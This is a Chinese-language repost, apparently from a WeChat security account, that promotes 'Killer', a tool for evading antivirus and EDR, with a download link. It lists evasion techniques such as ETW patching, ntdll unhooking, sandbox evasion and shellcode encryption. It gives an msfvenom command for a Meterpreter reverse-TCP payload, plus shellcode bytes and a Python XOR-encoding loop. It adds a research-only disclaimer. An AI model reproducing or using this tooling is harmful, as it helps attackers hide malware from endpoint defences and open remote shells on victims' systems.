工具介绍
工具特点
用于逃避内存扫描的模块踩踏
ntdll 副本取消 DLL
IAT 隐藏和混淆以及 API 脱钩
ETW Patchnig 用于绕过某些安全控制
包括沙箱规避技术和基本反调试
XOR 完全混淆(函数 - 键 - Shellcode)
Shellcode 反转并加密
API 的情况下将有效负载移动到神圣的内存中
GetProcAddress 和 GetModuleHandle 由 @cocomelonc 实现
x64 和 x86 架构
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST<IP> LPORT<PORT> -f py
data = b"xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8bx50x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xffxacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf2x52x57x8bx52x10x8bx4ax3cx8bx4cx11x78xe3x48x01xd1x51x8bx59x20x01xd3x8bx49x18xe3x3ax49x8bx34x8bx01xd6x31xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03x7dxf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xffxe0x5fx5fx5ax8bx12xebx8dx5dx6ax01x8dx85xb2x00x00x00x50x68x31x8bx6fx87xffxd5xbbxf0xb5xa2x56x68xa6x95xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75x05xbbx47x13x72x6fx6ax00x53xffxd5x63x61x6cx63x2ex65x78x65x00"
key = 0x50 # Put here your key as byte like for example (0x90 or 0x40 or 0x30) and more...
print('{ ', end='')
for i in data:
print(hex(i ^ key), end=', ')
print("0x0 };") # Notice that it adds one byte "0x0" to the end.
第1部分 => https://medium.com/@0xHossam/av-edr-evasion-malware-development-933e50f47af5
第2部分 => https://medium.com/@0xHossam/av-edr-evasion-malware-development-p2-7a947f7db354
第3部分 => https://medium.com/@0xHossam/unhooking-memory-object-hiding-3229b75618f7
第4部分 => https://medium.com/@0xHossam/av-edr-evasion-malware-development-p-4-162662bb630ee
PoC(概念验证):
https://antiscan.me/images/result/07OkIKKhpRsG.png
下载地址
https://github.com/0xHossam/Killer
原文始发于微信公众号(Hack分享吧):Killer!逃避AV和EDR的免杀工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论